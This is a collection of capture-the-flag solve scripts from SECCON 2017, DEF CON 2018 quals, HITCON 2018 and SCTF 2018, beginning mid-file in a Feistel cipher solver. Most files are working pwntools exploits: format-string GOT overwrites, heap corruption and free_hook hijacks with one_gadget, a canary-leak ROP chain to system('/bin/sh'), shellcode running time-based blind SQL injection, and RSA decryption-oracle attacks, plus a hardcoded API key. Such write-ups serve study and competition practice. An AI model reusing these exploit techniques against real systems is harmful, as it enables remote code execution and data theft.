14 | cipher = "3f29 4317 e51e 932a a1c0 52b7 94f7 86e4 277d 5948 dd43 ab45 7f6b ae56 09e7 3aec 670e 5d3d 0b90 e42c 2e03 03bc d2e3 d0bb".replace(" ", "").decode("hex")
15 | 
16 | k = []
17 | k.append(u64("83a6fa4409377170".decode("hex")))
18 | k.append(u64("92e55b2fe96f930c".decode("hex")))
19 | 
20 | def to_blocks(x):
21 |     assert(len(x) % 16 == 0)
22 |     blks = []
23 |     for i in xrange(0, len(x), 16):
24 |         d = []
25 |         for j in xrange(2):
26 |             d.append(u64(x[i + 8*j:i + 8*j + 8]))
27 |         blks.append(d)
28 |     return blks
29 | 
30 | def f(x, y):
31 |     gdb_ = gdb.replace("{{RDI}}", str(x))
32 |     gdb_ = gdb_.replace("{{RSI}}", str(y))
33 |     with open("gdb-script", "wb") as f:
34 |         f.write(gdb_)
35 |     out = commands.getoutput("gdb -x gdb-script ./cipher").splitlines()[-1]
36 |     out = int(out.split("\t")[1], 16)
37 |     #print("out : %16X\n" % out)
38 |     return out
39 | 
40 | def getk(i):
41 |     if len(k) <= i or k[i] is None:
42 |         prev = getk(i - 2)
43 |         #assert(len(k) == i)
44 |         while len(k) <= i:
45 |            k.append(None)
46 |         k[i] = f(prev, 0x9104F95DE694DC50)
47 |     return k[i]
48 | 
49 | # Li+1 = Ri
50 | # Ri+1 = Li ^ F(Ri, Ki)
51 | 
52 | # Ri = Li+1
53 | # Li = Ri+1 ^ F(Li, Ki)
54 | 
55 | # getk(14)
56 | blks = to_blocks(cipher)
57 | for i in xrange(0, len(blks)):
58 |     l, r = blks[i]
59 |     l, r = r, l
60 | 
61 |     for j in xrange(14):
62 |         l,r = r,l
63 |         ks = getk(14 - j - 1)
64 |         l ^= f(r, ks)
65 |     print(p64(r) + p64(l))
66 | #getk(2)
67 | print(map(lambda x:hex(x), k))
68 | 


--------------------------------------------------------------------------------
/2017/seccon/mboard/exploit.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | import time
 3 | context.log_level = 'debug'
 4 | 
 5 | def m():
 6 |     r.recvuntil("menu >")
 7 | 
 8 | def send(msg):
 9 |     r.send(msg)
10 |     time.sleep(0.05)
11 | 
12 | def reg(name, msg):
13 |     m()
14 |     send("2\n")
15 |     send("%s" % name)
16 |     send("%d\n" % len(msg))
17 |     send(msg)
18 | 
19 | def rm(idx):
20 |     m()
21 |     send("3\n")
22 |     send("%d\n" % idx)
23 | 
24 | def l():
25 |     m()
26 |     send("1\n")
27 | 
28 | def edit(idx, msg):
29 |     m()
30 |     send("4\n")
31 |     send("%d\n" % idx)
32 |     send("%d\n" % len(msg))
33 |     send(msg)
34 | 
35 | def fsb(msg):
36 |     if (len(msg) > 16):
37 |         print("MSG IS TOO LONG: %s" % msg)
38 |         raise
39 |     edit(0, (msg + "\n").ljust(17, "A"))
40 |     l()
41 |     r.recvuntil("Message Board Entry\n")
42 |     return r.readline()
43 | 
44 | def chfmt(delim, name, align):
45 |     m()
46 |     send(delim + "\n")
47 |     send(name + "\n")
48 |     send(align + "\n")
49 | 
50 | r = remote('localhost', 4444)
51 | reg("A"*16, "A"*20)
52 | l()
53 | r.readline()
54 | r.readline()
55 | heap = u32(r.readline()[21:25]) - 0xc0
56 | print("HEAP: %08X" % heap) # 0x56559000
57 | 
58 | reg("A", "A"*20)
59 | rm(0)
60 | rm(1)
61 | rm(0)
62 | reg("A", "A"*20)
63 | reg("A", "A"*256)
64 | reg("A", "A"*16 + p32(heap + 0x8))
65 | 
66 | bin_base = int(fsb("%26$p").split("0x")[1], 16) - 0x99d
67 | print("BIN_BASE: %08X" % bin_base)
68 | libc_base = int(fsb("%106$p").split("0x")[1], 16) - 0x19af3
69 | print("LIBC_BASE: %08X" % libc_base)
70 | 
71 | raw_input()
72 | argv = int(fsb("%108$p").split("0x")[1], 16)
73 | argv1 = int(fsb("%148$p").split("0x")[1], 16)
74 | if argv1 % 4:
75 |     argv1 += (4 - argv1 % 4)
76 | gap = (argv1 - argv) / 4 + 148
77 | print("ARGV: %08X" % argv)
78 | print("ARGV1: %08X" % argv1)
79 | GOT = bin_base + 0x3010
80 | value = libc_base + 0x00040310
81 | 
82 | for j in xrange(4):
83 |     data = GOT + j
84 | 
85 |     for i in xrange(4):
86 |         fsb("%{0}c%108$hhn\n".format((argv1 + i) & 0xff))
87 |         fsb("%{0}c%148$hhn\n".format(data & 0xff))
88 |         data >>= 8
89 | 
90 |     fsb("%{0}c%{1}$hhn\n".format(value & 0xff, gap))
91 |     value >>= 8
92 | 
93 | edit(0, "cat /proc/self/maps\n")
94 | raw_input("XXX\n")
95 | chfmt("1", "y", "y")
96 | l()
97 | raw_input()
98 | 


--------------------------------------------------------------------------------
/2017/seccon/shopping/exploit.py:
--------------------------------------------------------------------------------
  1 | from pwn import *
  2 | import time
  3 | context.log_level = 'debug'
  4 | 
  5 | def send(msg):
  6 |     time.sleep(0.1)
  7 |     r.send(msg)
  8 | 
  9 | def m():
 10 |     r.recvuntil(": ")
 11 | 
 12 | def cr_pr(name, pr, stock=None):
 13 |     m()
 14 |     send("1\n")
 15 |     if stock == None:
 16 |         send("%s\n%d\n" % (name, pr))
 17 |     else:
 18 |         send("%s\n%d\n%d\n" % (name, pr, stock))
 19 | 
 20 | def l_pr():
 21 |     m()
 22 |     send("2\n")
 23 |     return r.recvuntil("####")
 24 | 
 25 | def cr_crt(name, num):
 26 |     m()
 27 |     send("1\n%s\n%d\n" % (name, num))
 28 | 
 29 | def buy():
 30 |     m()
 31 |     send("3\n")
 32 |     r.recvuntil("purchase.")
 33 | 
 34 | def switch():
 35 |     m()
 36 |     global mode
 37 |     if mode == "1":
 38 |         mode = "2"
 39 |     else:
 40 |         mode = "1"
 41 |     send("0\n") # out mode
 42 |     m()
 43 |     send("%s\n" % mode)
 44 | 
 45 | def br(name, when):
 46 |     r.recvuntil("(y/N) >>")
 47 |     send("y\n")
 48 |     r.recvuntil("your name  :")
 49 |     send(name + "\n")
 50 |     r.recvuntil("when crash :")
 51 |     send(when + "\n")
 52 | 
 53 | def hidden(name=None, reason=None):
 54 |     m()
 55 |     send("-1\n")
 56 |     if name is not None:
 57 |         send("y\n")
 58 |         m()
 59 |         send(name + "\n")
 60 |     else:
 61 |         send("n\n")
 62 | 
 63 |     if reason is not None:
 64 |         send("y\n")
 65 |         m()
 66 |         send(reason + "\n")
 67 |     else:
 68 |         send("n\n")
 69 | 
 70 | def reset_crt():
 71 |     m()
 72 |     send("4\n")
 73 | 
 74 | def leak(addr):
 75 |     fake_prod = p64(addr) + "2"*8 + p64(0x40) + p64(0)
 76 |     fake_crt = p64(0) * 3
 77 | 
 78 |     m()
 79 |     send("0\n")
 80 |     hidden("A" * 0xd0 + fake_crt + "\x00" * 8 + fake_prod, "B")
 81 | 
 82 |     send("1\n") # shop mode
 83 | 
 84 |     l = l_pr()
 85 |     r.recvuntil("001 : ")
 86 |     return u64(r.readline().split("(")[0].ljust(8, "\x00"))
 87 | 
 88 | def sub(addr, val):
 89 |     fake_prod = "1"*8 + "2"*8 + p64(0x40) + "\x00"*8
 90 |     fake_crt = p64(addr - 0x10) + p32(val) + "\x00" * 4 + "\x00" * 8
 91 | 
 92 |     m()
 93 |     send("0\n")
 94 |     hidden("A" * 0xc0 +"\x00" * 8 + p64(0x40) + fake_crt + "\x00"*16 + fake_prod, "B")
 95 | 
 96 |     send("2\n")
 97 |     buy()
 98 | 
 99 | r = remote('shopping.pwn.seccon.jp', 16294)
100 | mode = "1"
101 | 
102 | m()
103 | send("1\n") # shop mode
104 | 
105 | cr_pr("a", 65536, 65536)
106 | v = float(l_pr().split("x")[1].split(")")[0])
107 | print("VAR: %f" % v)
108 | 
109 | switch()
110 | cr_crt("a", (int)(65536 / 2 /   v))
111 | buy()
112 | 
113 | switch()
114 | br("C" * 0x3e, "C" * 0x3e) # overflow size
115 | 
116 | cr_pr("a", 1, 4)
117 | switch()
118 | 
119 | cr_crt("a", 1)
120 | switch() # make heap same
121 | 
122 | cr_pr("b", 1, 4) # target
123 | 
124 | heap = leak(0x603118)
125 | print("HEAP: %16X" % heap)
126 | libc_base = leak(0x603060) - 0x0000000000021e50
127 | print("LIBC_BASE: %16X" % libc_base)
128 | 
129 | sub(0x6030C0, 0x0000000000088710 - 0x0000000000046590)
130 | 
131 | leak(0x6030C0) # make valid product structure
132 | cr_pr("/bin/sh", 1, 1)
133 | r.interactive()
134 | 


--------------------------------------------------------------------------------
/2017/seccon/vignere/solve.py:
--------------------------------------------------------------------------------
 1 | import sys
 2 | import hashlib
 3 | C = "LMIG}RPEDOEEWKJIQIWKJWMNDTSR}TFVUFWYOCBAJBQ"
 4 | chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZ{}"
 5 | mapping = """A|ABCDEFGHIJKLMNOPQRSTUVWXYZ{}
 6 | B|BCDEFGHIJKLMNOPQRSTUVWXYZ{}A
 7 | C|CDEFGHIJKLMNOPQRSTUVWXYZ{}AB
 8 | D|DEFGHIJKLMNOPQRSTUVWXYZ{}ABC
 9 | E|EFGHIJKLMNOPQRSTUVWXYZ{}ABCD
10 | F|FGHIJKLMNOPQRSTUVWXYZ{}ABCDE
11 | G|GHIJKLMNOPQRSTUVWXYZ{}ABCDEF
12 | H|HIJKLMNOPQRSTUVWXYZ{}ABCDEFG
13 | I|IJKLMNOPQRSTUVWXYZ{}ABCDEFGH
14 | J|JKLMNOPQRSTUVWXYZ{}ABCDEFGHI
15 | K|KLMNOPQRSTUVWXYZ{}ABCDEFGHIJ
16 | L|LMNOPQRSTUVWXYZ{}ABCDEFGHIJK
17 | M|MNOPQRSTUVWXYZ{}ABCDEFGHIJKL
18 | N|NOPQRSTUVWXYZ{}ABCDEFGHIJKLM
19 | O|OPQRSTUVWXYZ{}ABCDEFGHIJKLMN
20 | P|PQRSTUVWXYZ{}ABCDEFGHIJKLMNO
21 | Q|QRSTUVWXYZ{}ABCDEFGHIJKLMNOP
22 | R|RSTUVWXYZ{}ABCDEFGHIJKLMNOPQ
23 | S|STUVWXYZ{}ABCDEFGHIJKLMNOPQR
24 | T|TUVWXYZ{}ABCDEFGHIJKLMNOPQRS
25 | U|UVWXYZ{}ABCDEFGHIJKLMNOPQRST
26 | V|VWXYZ{}ABCDEFGHIJKLMNOPQRSTU
27 | W|WXYZ{}ABCDEFGHIJKLMNOPQRSTUV
28 | X|XYZ{}ABCDEFGHIJKLMNOPQRSTUVW
29 | Y|YZ{}ABCDEFGHIJKLMNOPQRSTUVWX
30 | Z|Z{}ABCDEFGHIJKLMNOPQRSTUVWXY
31 | {|{}ABCDEFGHIJKLMNOPQRSTUVWXYZ
32 | }|}ABCDEFGHIJKLMNOPQRSTUVWXYZ{""".splitlines()
33 | d = {}
34 | 
35 | for m in mapping:
36 |     k, v = m.split("|")
37 |     d[k] = v
38 | 
39 | p = "SECCON{"
40 | k = ""
41 | c = "LMIG}RPEDOEEWKJIQIWKJWMNDTSR}TFVUFWYOCBAJBQ"
42 | for i in xrange(len(p)):
43 |     pidx = chars.index(p[i])
44 |     cidx = chars.index(c[i])
45 |     k += (chars[(cidx - pidx) % len(chars)])
46 | 
47 | for a1 in chars:
48 |     for a2 in chars:
49 |         for a3 in chars:
50 |             for a4 in chars:
51 |                 for a5 in chars:
52 |                     k1 = k + a1 + a2 + a3 + a4 + a5
53 |                     p1 = ""
54 | 
55 |                     k1 = "VIGENERECODE"
56 |                     for i in xrange(len(c)):
57 |                         cidx = chars.index(c[i])
58 |                         kidx = chars.index(k1[i % len(k1)])
59 |                         ch = chars[(cidx - kidx) % len(chars)]
60 |                         p1 += ch
61 |                     print(p1)
62 |                     h = hashlib.md5(p1).hexdigest()
63 |                     if h == "f528a6ab914c1ecf856a1d93103948fe":
64 |                         print("FOUND! : %s" % k1)
65 |                         sys.exit(-1)
66 | 


--------------------------------------------------------------------------------
/2018/defcon/bitflipper/solve.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | from pow import solve_pow
 3 | import time
 4 | import sys
 5 | import random
 6 | import collections
 7 | import re
 8 | 
 9 | # context.log_level = 'debug'
10 | 
11 | chars = collections.OrderedDict()
12 | 
13 | def flip(i, j):
14 |     r = remote("61421a06.quals2018.oooverflow.io", 5566)
15 | 
16 |     out = r.recvuntil('Solution:')
17 |     chal = re.findall(r'Challenge: (.*?)\n', out)[0]
18 |     n = int(re.findall(r'n: (.*?)\n', out)[0])
19 | 
20 |     ans = solve_pow(chal, n)
21 |     r.sendline(str(ans))
22 | 
23 |     ans = "\n"
24 | 
25 |     offset = (0xff ^ (1 << i))
26 |     if j is not None:
27 |         offset ^= (1 << j)
28 | 
29 |     flips = [
30 |             (0xDAE, 2),
31 |             (0xFCE + 1, 6), # check
32 |             (0xD05 + 3, i)
33 |     ]
34 | 
35 |     if j is not None:
36 |         flips.append((0xD05 + 3, j))
37 | 
38 |     r.sendline(str(len(flips)))
39 | 
40 |     for x, y in flips:
41 |         r.sendline("%d" % (x * 8 + y))
42 | 
43 |     m = r.readall()
44 |     found = (re.findall(r"\[([-\d]*)msecret_flag.txt", m))
45 |     if not found:
46 |         return
47 |     found = int(found[0]) + 0x30 - 30
48 | 
49 |     try:
50 |         chars[offset] = chr(found)
51 |         print("%d: %s" % (offset, chr(found)))
52 |         for k in sorted(chars.keys()):
53 |             v = chars[k]
54 |             print("%d: %s" % (k, v))
55 |     except ValueError:
56 |         pass
57 | 
58 |     r.close()
59 | 
60 | for i in xrange(8):
61 |     for j in [None] + range(i + 1, 8):
62 |         flip(i, j)
63 | 


--------------------------------------------------------------------------------
/2018/defcon/lib/pow.c:
--------------------------------------------------------------------------------
 1 | // gcc poc.c -o poc -lssl -lcrypto
 2 | #include <stdio.h>
 3 | #include <stdint.h>
 4 | #include <stdlib.h>
 5 | #include <string.h>
 6 | #include "openssl/sha.h"
 7 | #include <byteswap.h>
 8 | 
 9 | 
10 | char buf[0x100];
11 | 
12 | int do_hash(char *pre, uint64_t post, char *hash) {
13 |     int len = strlen(pre);
14 |     memcpy(buf, pre, len);
15 |     memcpy(buf+len, &post, 8);
16 |     SHA256_CTX sha256;
17 |     SHA256_Init(&sha256);
18 |     SHA256_Update(&sha256, buf, len+8);
19 |     SHA256_Final(hash, &sha256);
20 | }
21 | 
22 | int main(int argc, char **argv) {
23 |     if (argc < 3) exit(0);
24 |     int n = atoi(argv[2]);
25 |     char *pre = argv[1];
26 | 
27 |     uint64_t cand = 0;
28 |     uint64_t hash[4];
29 |     while(1) {
30 |         do_hash(pre, cand, (char *)hash);
31 |         if (!(__bswap_64(hash[3]) & ((1 << n) - 1))) {
32 |             printf("%ld\n", cand);
33 |             exit(0);
34 |         }
35 |         cand += 1;
36 |     }
37 | }
38 | 


--------------------------------------------------------------------------------
/2018/defcon/lib/pow.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | from __future__ import print_function
 3 | import sys
 4 | import struct
 5 | import hashlib
 6 | import commands
 7 | import os
 8 | 
 9 | # inspired by C3CTF's POW
10 | 
11 | def pow_hash(challenge, solution):
12 |     return hashlib.sha256(challenge.encode('ascii') + struct.pack('<Q', solution)).hexdigest()
13 | 
14 | def check_pow(challenge, n, solution):
15 |     h = pow_hash(challenge, solution)
16 |     return (int(h, 16) % (2**n)) == 0
17 | 
18 | def solve_pow(challenge, n):
19 |     return int(commands.getoutput("%s %s %d"% (os.path.join(os.path.dirname(__file__), "pow"), challenge, n)))
20 | 
21 |     candidate = 0
22 |     while True:
23 |         if check_pow(challenge, n, candidate):
24 |             return candidate
25 |         candidate += 1
26 | 
27 | if __name__ == '__main__':
28 |     challenge = sys.argv[1]
29 |     n = int(sys.argv[2])
30 | 
31 |     print('Solving challenge: "{}", n: {}'.format(challenge, n))
32 | 
33 |     solution = solve_pow(challenge, n)
34 |     print('Solution: {} -> {}'.format(solution, pow_hash(challenge, solution)))
35 | 


--------------------------------------------------------------------------------
/2018/defcon/preview/solve.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | from pow import solve_pow
 3 | import time
 4 | import sys
 5 | import random
 6 | import collections
 7 | import re
 8 | import pickle
 9 | import os
10 | 
11 | context.log_level = 'debug'
12 | 
13 | r = remote('cee810fa.quals2018.oooverflow.io', 31337)
14 | 
15 | out = r.recvuntil('Solution:')
16 | chal = re.findall(r'Challenge: (.*?)\n', out)[0]
17 | n = int(re.findall(r'n: (.*?)\n', out)[0])
18 | 
19 | ans = solve_pow(chal, n)
20 | r.sendline(str(ans))
21 | 
22 | #r = process(['preview', '1000'])
23 | r.recvuntil("requests\n")
24 | r.sendline("HEAD /proc/self/maps")
25 | r.readline()
26 | 
27 | l = r.readline()
28 | a1 = int(l.split("-")[0], 16) >> 12
29 | ld = "ld" in l
30 | 
31 | for i in xrange(6):
32 |     a2 = int(r.readline().split("-")[0], 16) >> 12
33 |     if (a1 >> 20) != (a2 >> 20):
34 |         break
35 | 
36 | if not ld:
37 |     a1, a2 = a2, a1
38 | canary = (a1 << 36) | (a2 << 8)
39 | print("CANARY: %x" % canary)
40 | 
41 | bin_base = (a2 << 12)
42 | print("BIN_BASE: %x" % bin_base)
43 | pop_rdi = bin_base + 0x10b3
44 | main = bin_base + 0x0FE8
45 | puts_got = bin_base + 0x202020
46 | puts_plt = bin_base + 0x9e0
47 | 
48 | msg = "A"*(0x60 - 8) + p64(canary) + "B"*8 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main)
49 | raw_input("aa\n")
50 | r.sendline(msg)
51 | #XXX
52 | libc_base = u64(r.recvuntil("Welcome to preview 0.1").split("\n")[-2].ljust(8, "\x00")) - 0x000000000006f690
53 | print("LIBC_BASE: %x" % libc_base)
54 | system = libc_base + 0x0000000000045390
55 | bin_sh = libc_base + 0x18CD57
56 | 
57 | msg = "A"*(0x60 - 8) + p64(canary) + "B"*8 + p64(pop_rdi) + p64(bin_sh) + p64(system) + p64(main)
58 | r.sendline(msg)
59 | 
60 | r.interactive()
61 | 


--------------------------------------------------------------------------------
/2018/defcon/sbva/crawl.py:
--------------------------------------------------------------------------------
 1 | from bs4 import BeautifulSoup
 2 | 
 3 | import requests
 4 | 
 5 | f = open("useragent.txt", "w")
 6 | 
 7 | for i in xrange(1, 468):
 8 |     print("CRAWL %d" % i)
 9 |     url = 'https://developers.whatismybrowser.com/useragents/explore/software_name/firefox/%d' % i
10 |     r  = requests.get(url)
11 |     data = r.text
12 |     soup = BeautifulSoup(data)
13 | 
14 |     for link in soup.find_all('a'):
15 |         if "useragents" in link.get('href'):
16 |             try:
17 |                 if "Mozilla" in link.string:
18 |                     f.write(link.string + "\n")
19 |             except UnicodeEncodeError:
20 |                 pass
21 |     r.close()
22 | 


--------------------------------------------------------------------------------
/2018/defcon/sbva/solve.py:
--------------------------------------------------------------------------------
 1 | import requests
 2 | import time
 3 | 
 4 | start = False
 5 | data = {"username":"admin@oooverflow.io", "password":"admin"}
 6 | cookie = 'a3jls5bv5t2aqj5l01tgja31o5'
 7 | 
 8 | for user_agent in open("useragent.txt"):
 9 |     user_agent = user_agent.strip()
10 |     headers = {'User-Agent': user_agent, 'PHPSESSID': cookie}
11 |     r = requests.post('http://0da57cd5.quals2018.oooverflow.io/login.php', headers=headers, data=data,  allow_redirects=False)
12 |     if not 'Location' in r.headers:
13 |         print(r.text)
14 | 
15 |     if r.headers['Location'] != 'wrongbrowser.php':
16 |         print("%s" % user_agent)
17 |     r = requests.get('http://0da57cd5.quals2018.oooverflow.io/wrongbrowser.php', headers=headers)
18 | 


--------------------------------------------------------------------------------
/2018/defcon/shellme/solve.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | from collections import defaultdict
 3 | import requests
 4 | context.clear(arch='amd64')
 5 | 
 6 | off = 1
 7 | soff = 1
 8 | 
 9 | def get_time(soff, off):
10 |     query = "select IF(substr(LPAD(bin(ascii(substr((select group_concat(flag) from flag), {off}, 1))), 8, 0), {soff}, 1) = 0x30, sleep(3), 2)".format(off=off, soff=soff)
11 |     encode = p32(len(query) + 1) + "\x03" + query
12 |     fd = 4
13 |     shellcode = shellcraft.amd64.linux.echo(encode, fd) + shellcraft.amd64.linux.read(fd, count=4)
14 |     shellcode = asm(shellcode)
15 |     data = {'shell':shellcode}
16 |     begin = time.time()
17 |     r = requests.post('http://b9d6d408.quals2018.oooverflow.io/cgi-bin/index.php', data)
18 |     elapsed = time.time() - begin
19 |     r.close()
20 |     return elapsed
21 | 
22 | ans = ""
23 | c = ""
24 | for off in xrange(len(ans) + 1, 100):
25 |     found = defaultdict(int)
26 |     gonext = False
27 |     print("FINDING %dth char" % off)
28 |     while True:
29 |         for soff in xrange(1, 8 + 1):
30 |             elapsed = 0
31 |             for i in xrange(3):
32 |                 elapsed += get_time(soff, off)
33 |             if elapsed > 8:
34 |                 c += "0"
35 |             else:
36 |                 c += "1"
37 | 
38 |             print(elapsed, c)
39 |             if len(c) == 8:
40 |                 candidate = chr(int(c, 2))
41 |                 found[candidate] += 1
42 |                 print("candidate: %c" % candidate)
43 |                 if found[candidate] == 1:
44 |                     ans += candidate
45 |                     print("ANS:%s" % ans)
46 |                     gonext=True
47 |                 c = ""
48 | 
49 |         if gonext:
50 |             break
51 | 
52 | 
53 | # flag: "OOO{she||code and webshell is old news, get with the times my friend!}"
54 | 


--------------------------------------------------------------------------------
/2018/hitcon/lost-key/solve.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | from Crypto.Util.number import *
 3 | from gmpy import *
 4 | import os,sys
 5 | 
 6 | NQ = 0
 7 | 
 8 | def enc(r, n):
 9 |     global NQ
10 |     NQ += 1
11 |     r.recvuntil('cmd: ')
12 |     r.sendline('A')
13 |     r.recvuntil('input: ')
14 |     r.sendline(long_to_bytes(n).encode('hex'))
15 |     return bytes_to_long(r.readline().strip().decode('hex'))
16 | 
17 | def dec(r, n):
18 |     global NQ
19 |     NQ += 1
20 |     r.recvuntil('cmd: ')
21 |     r.sendline('B')
22 |     r.recvuntil('input: ')
23 |     r.sendline(long_to_bytes(n).encode('hex'))
24 |     return bytes_to_long(r.readline().strip().decode('hex'))
25 | 
26 | r = process(['python', 'rsa-b667a9ca0d5c6735e5609565d1fd6ab9.py'])
27 | r.readline()
28 | enc_flag = bytes_to_long(r.readline().strip().decode('hex'))
29 | 
30 | # compute n
31 | m = 2
32 | e = enc(r, m)
33 | n = 0
34 | 
35 | for i in xrange(16):
36 |     e2 = enc(r, m ** 2)
37 |     n = gcd(e**2 - e2, n)
38 |     e = e2
39 |     m = m ** 2
40 | 
41 | # leak byte per byte
42 | pt = dec(r, enc_flag)
43 | mod = 1
44 | e = enc_flag
45 | 
46 | for i in xrange(60):
47 |     mod *= 2 ** 8
48 |     i28 = invert(mod, n)
49 |     e28 = enc(r, i28)
50 | 
51 |     e = enc_flag * e28
52 |     d = dec(r, e)
53 |     byte = (d - ((pt * i28) % n)) % 256
54 |     pt |= (byte << (8 * i + 8))
55 |     print('ans: %s' % long_to_bytes(pt))
56 | 


--------------------------------------------------------------------------------
/2018/hitcon/lost-modulus/solve.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | from Crypto.Util.number import *
 3 | from gmpy import *
 4 | from random import *
 5 | import sys,os
 6 | 
 7 | NQ = 0
 8 | 
 9 | def calcA(r, m):
10 |     global NQ
11 |     NQ += 1
12 |     r.recvuntil('cmd: ')
13 |     r.sendline("A")
14 |     r.recvuntil('input: ')
15 |     r.sendline(long_to_bytes(m).encode('hex'))
16 |     return bytes_to_long(r.readline().strip().decode('hex'))
17 | 
18 | def calcB(r, m):
19 |     global NQ
20 |     NQ += 1
21 |     r.recvuntil('cmd: ')
22 |     r.sendline("B")
23 |     r.recvuntil('input: ')
24 |     r.sendline(long_to_bytes(m).encode('hex'))
25 |     return bytes_to_long(r.readline().strip().decode('hex'))
26 | 
27 | def fixup(r, n):
28 |     dec = calcB(r, calcA(r, n | 0xff))
29 |     for i in xrange(256):
30 |         possible_n = n | i
31 |         if (n | 0xff) % possible_n == dec:
32 |             return possible_n
33 |     raise
34 | 
35 | gmod = 2 ** 8
36 | pt = 0xa
37 | 
38 | while True:
39 |     NQ = 0
40 |     r = process(['python', 'crypto-33dee9470e5b5639777f7c50e4c650e3.py'])
41 |     #r = remote('13.112.92.9', 21701)
42 |     try:
43 |         r.recvline()
44 |         enc_flag = bytes_to_long(r.recvline().strip().decode('hex'))
45 | 
46 |         c = calcB(r, calcA(r, 1 << 1023))
47 |         if c == 0:
48 |             n = (1 << 1023)
49 |             bits = 1022
50 |         else:
51 |             n = (1 << 1022)
52 |             bits = 1021
53 | 
54 |         for i in xrange(bits, 7, -1):
55 |             guess = n | (1 << i)
56 |             if calcB(r, calcA(r, guess)) == 0:
57 |                 n = guess
58 | 
59 |         n = fixup(r, n)
60 | 
61 |         while NQ < 2048:
62 |             e = (enc_flag * (-pt * n + 1)) % (n*n)
63 |             test = pow(e, invert(gmod, n), n*n)
64 |             d = calcB(r, test)
65 |             pt += d * gmod
66 |             gmod = gmod * (2 ** 8)
67 |             print(long_to_bytes(pt))
68 |             #raw_input()
69 |     finally:
70 |         r.close()
71 | 
72 | r.interactive()
73 | 


--------------------------------------------------------------------------------
/2018/sctf/BankRobber/solve.sol:
--------------------------------------------------------------------------------
 1 | pragma solidity ^0.4.18;
 2 | 
 3 | contract SCTFBank{
 4 |     event LogBalance(address addr, uint256 value);
 5 |     mapping (address => uint256) private balance;
 6 |     uint256 private donation_deposit;
 7 |     address private owner;
 8 |     bool locked;
 9 | 
10 |     modifier noReentrancy() {
11 |       require(!locked);
12 |       locked = true;
13 |       _;
14 |       locked = false;
15 |     }
16 | 
17 |     //constructor
18 |     constructor() public{
19 |         owner = msg.sender;
20 |     }
21 |     
22 |     //logging balance of requested address
23 |     function showBalance(address addr) public {
24 |         emit LogBalance(addr, balance[addr]);
25 |     }
26 | 
27 |     //withdraw my balance
28 |     function withdraw(uint256 value) noReentrancy public{
29 |         require(balance[msg.sender] >= value);
30 |         msg.sender.call.value(value)();
31 |         balance[msg.sender] -= value;
32 |     }
33 | 
34 |     //transfer my balance to other
35 |     function transfer(address to, uint256 value) public {
36 |         require(balance[msg.sender] >= value);
37 |         balance[msg.sender] -= value;
38 |         balance[to]+=value;
39 |     }
40 | 
41 |     //transfer my balance to others
42 |     function multiTransfer(address[] to_list, uint256 value) public {
43 |         require(value*to_list.length >= value);
44 |         require(balance[msg.sender] >= value*to_list.length);
45 |         balance[msg.sender] -= value*to_list.length;
46 |         for(uint i=0; i < to_list.length; i++){
47 |             balance[to_list[i]] += value;
48 |         }
49 |     }
50 |     
51 |     //donate my balance
52 |     function donate(uint256 value) public {
53 |         require(balance[msg.sender] >= value);
54 |         balance[msg.sender] -= value;
55 |         donation_deposit += value;
56 |     }
57 | 
58 |     //Only bank owner can deliver donations to anywhere he want.
59 |     function deliver(address to) public {
60 |         require(msg.sender == owner);
61 |         to.transfer(donation_deposit);
62 |         donation_deposit = 0;
63 |     }
64 |  
65 |     //balance deposit, simple fallback function
66 |     function () payable public {
67 |         balance[msg.sender]+=msg.value;
68 |     }
69 | }
70 | //END
71 | 
72 | 


--------------------------------------------------------------------------------
/2018/sctf/CowBoy/solve.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | import json
 3 | 
 4 | context.log_level = 'debug'
 5 | 
 6 | p = remote('cowboy.eatpwnnosleep.com', 14697)
 7 | 
 8 | a = {
 9 |     'apikey' : '003b1b624e8178ca00c495a2be68c37ae5cc945080eb286fb6bf3a476d7bf347',
10 | }
11 | 
12 | p.send(json.dumps(a).encode())
13 | print (p.recv(102400))
14 | #p = process('./CowBoy_fb009bfafd91a8c5211c959cc3a5fc7a4ae8ad5d', env={"LD_PRELOAD":"/home/insu/sctf/CowBoy/disable-alarm/libhook.so"})
15 | 
16 | def banner():
17 |     p.recvuntil("5. exit\n----------------------------------------\n")
18 | 
19 | def alloc(sz):
20 |     banner()
21 |     p.send("1\n")
22 |     p.send("%d\n" % sz)
23 |     p.recvuntil(" n < 2049: ")
24 |     return int(p.readline().split(" = ")[1], 16)
25 | 
26 | def fill(bin_num, chunk_num, data):
27 |     banner()
28 |     p.send("4\n")
29 |     p.send("%d\n" % bin_num)
30 |     p.send("%d\n" % chunk_num)
31 |     p.send(data)
32 | 
33 | def show():
34 |     banner()
35 |     p.send("3\n")
36 |     return p.readline()
37 | 
38 | def dealloc(bin_num, chunk_num):
39 |     banner()
40 |     p.send("2\n")
41 |     p.send("%d\n" % bin_num)
42 |     p.send("%d\n" % chunk_num)
43 | 
44 | RAND_OFF = 0x000000000003af60
45 | 
46 | ptr = alloc(0)
47 | fill(0, 0, "A"*8 + p64(0x602090))
48 | ptr = alloc(0)
49 | 
50 | r = show()
51 | bin_base = int(r.split(" ")[-2], 16) - RAND_OFF
52 | print("BIN_BASE: %x" % bin_base)
53 | 
54 | free_hook = bin_base + 0x3C3EF8
55 | 
56 | fill(0, 0, "A"*8 + p64(free_hook))
57 | ptr = alloc(0)
58 | show()
59 | one_gadget = bin_base + 0x4526a
60 | fill(0, 4, p64(one_gadget) + "B"*8)
61 | 
62 | p.interactive()
63 | 


--------------------------------------------------------------------------------
/2018/sctf/DungeonQuest/solve.py:
--------------------------------------------------------------------------------
 1 | from pwn import *
 2 | context.log_level = 'debug'
 3 | #p = process("./qemu-aarch64 -g 1234 -L /home/insu/projects/xxx/venv/bin/fuzzer-libs/arm64 ./DungeonQuest".split())
 4 | #p = process("qemu-aarch64 -g 1234 -L /home/insu/projects/xxx/venv/bin/fuzzer-libs/arm64 ./DungeonQuest".split())
 5 | #p = process("qemu-aarch64 -L /home/insu/projects/xxx/venv/bin/fuzzer-libs/arm64 ./DungeonQuest".split())
